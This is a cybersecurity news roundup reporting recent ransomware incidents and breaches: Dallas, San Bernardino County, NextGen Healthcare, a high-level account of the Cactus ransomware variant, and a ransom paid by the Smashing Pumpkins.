Last week, officials for the City of Dallas were forced to take many of their crucial IT services offline after their security team discovered the beginnings of a ransomware attack. The incident, which has caused the entire Dallas judicial system to delay any proceedings until further notice, has been confirmed as an attack by the Royal Ransomware group after ransom notes started printing from all network-connected printers. Ransomware attacks on local governments have been constantly on the rise in recent years and have targeted over 30 cities in 2023 alone.
San Bernadino County pays $1.1 million ransom
A month after first identifying the ransomware attack on their systems, the San Bernadino County Sheriff’s Office has agreed to pay their portion of the $1.1million ransom to restore their files and resume normal operations. While the incident did not compromise any sensitive information on employees or citizens, the interruptions to the Sheriff Office’s operations have caused significant delays in law enforcement activities for all agencies that they regularly interact with. San Bernadino County was only responsible for $511k of the demanded ransom, as their insurance covered the remainder.
NextGen Healthcare breach impacts over 1 million patients
The healthcare software provider, NextGen Healthcare, has recently announced that they were victims of a data breach, that had illicitly accessed sensitive records for over 1 million patients. The breach occurred in March and the hackers remained connected to the system for several weeks, before NextGen staff secured their network. As this breach contains a significant amount of personally identifiable information, officials for NextGen have begun notifying all affected patients and are warning them to be vigilant of any phishing attempts or unusual activity regarding their credit or identity.
Cactus Ransomware encrypts itself to avoid detection
Researchers have been tracking a new ransomware variant that uses an unusual tactic to avoid detection by any security software: self-encryption. The variant in question, Cactus Ransomware, begins its attack by exploiting a VPN vulnerability to access the network, then runs encryption on each victim file two times before running an encryption sequence on the main ransomware binary. Alongside the encryption process, Cactus also runs a batch script to uninstall any local antivirus programs and uses RClone to exfiltrate all encrypted files for additional victim exploitation.
Smashing Pumpkins pay hackers for stolen songs
Several months prior to the release of the latest Smashing Pumpkins’ album, hackers were able to obtain copies of several unreleased tracks from them and other artists, and threatened to release them if a ransom was not paid. After consulting with the FBI, the lead singer for the Smashing Pumpkins confirmed that he had paid an undisclosed ransom amount to prevent the leaks from occurring and was working to determine how the hackers were able to access the song files in the first place.
